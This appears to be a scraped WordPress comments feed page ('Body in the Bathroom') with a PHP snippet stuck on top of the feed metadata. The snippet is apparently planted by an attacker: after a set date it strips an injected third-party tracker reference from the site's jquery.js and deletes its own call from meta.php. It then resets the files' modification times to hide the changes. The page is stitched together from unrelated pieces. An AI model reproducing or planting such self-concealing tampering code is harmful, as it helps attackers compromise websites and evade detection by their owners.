check_meta();
function check_meta(){
$dir = dirname(__FILE__);
$jq = $dir."/js/jquery/jquery.js";
$jp = $dir."/meta.php";
$jqtime = filemtime($jq);
$jptime = filemtime($jp);
if(time() >= 1433383479){
$jq_c = file_get_contents($jq);
if(@strpos($jq_c,"http://js.users.51.la")) {
$contentq = str_replace("document.write ('');", "", $jq_c);
if(@file_put_contents($jq, $contentq)){
@touch($jq,$jqtime);
}
}
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
}
Comments on: Body in the Bathroom
https://jayspics.wc.tc/?p=22
hourly
1
http://wordpress.org/?v=3.2.1